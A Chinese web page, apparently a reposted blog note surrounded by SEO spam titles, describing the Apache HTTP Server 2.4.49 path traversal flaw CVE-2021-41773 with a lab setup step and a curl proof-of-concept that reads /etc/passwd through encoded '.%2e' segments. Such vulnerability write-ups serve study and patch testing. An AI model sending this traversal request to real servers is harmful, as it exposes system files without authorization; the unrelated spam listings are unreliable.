当前位置: 首页 > news >正文

课题网站建设培训简讯房产中介做租单用哪个付费网站更好

课题网站建设培训简讯,房产中介做租单用哪个付费网站更好,服装企业的网站建设,商赢网站建设目录 四、Apache 4.1 CVE-2021-41773 漏洞简介 影响版本 环境搭建 漏洞复现 四、Apache 4.1 CVE-2021-41773 Apache HTTP Server 路径穿越漏洞 漏洞简介 该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory/>Require all gra…

目录

四、Apache

4.1 CVE-2021-41773

漏洞简介

影响版本

环境搭建

漏洞复现


四、Apache

4.1 CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件,在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)。

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid

漏洞复现

1.使用poc

curl http://IP:PORT/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

http://www.yayakq.cn/news/920180/

相关文章:

  • 平台网站模板淄博建企业网站
  • 怎样在设计网站做图赚钱吗怎么建设一个网站赚钱
  • 楼盘网站设计网站备案是哪个部门
  • 网站建设销售做些什么工作母婴网站建设方案
  • 漳州做网站制作网站运营方案案例
  • 做钓鱼网站论坛怎么自己免费做网站
  • 全能网站模板网站着陆页怎么做
  • 未央免费做网站提供邯郸网站建设
  • 连云港市城乡建设局网站手机网站标准字体大小
  • 小型IT网站开发公司怎么建设网站卖东西
  • 平面设计网站有什么东莞做网站的公司有哪些
  • 北京网站设计网站设计公司wordpress动态背景插件
  • 营销网站建设专业公司在西部数码做的企业网站不能与阿里巴巴网站相连接
  • 购买网站做网页游戏wordpress 如何修改关于我们
  • 海曙网站制作wordpress位置
  • 高校学生红色网站建设新手小白怎么做跨境电商
  • 网站子站怎么做安徽平台网站建设设计
  • 坪山网站建设设计做口腔科网站
  • 网站建设效果北京中联建设集团官网网站
  • 成都诗和远方网站建设个人电脑建网站
  • 中国建设法律法规网官方网站建设网站的公司有哪些知乎
  • 免费建单页网站小网站推荐一个
  • 洛阳哪里做网站建一个网站需要什么流程
  • 潍坊网站排名优化建站公司前途
  • 高端网站建设公司推荐wordpress主题 问答
  • 怎么向google提交网站wordpress下载功能
  • 保定做网站多钱wordpress审计
  • 邢台企业做网站哪家好重庆发布的最新消息今天
  • 什么网站可以做时间加减品物设计集团
  • 商标设计app舟山seo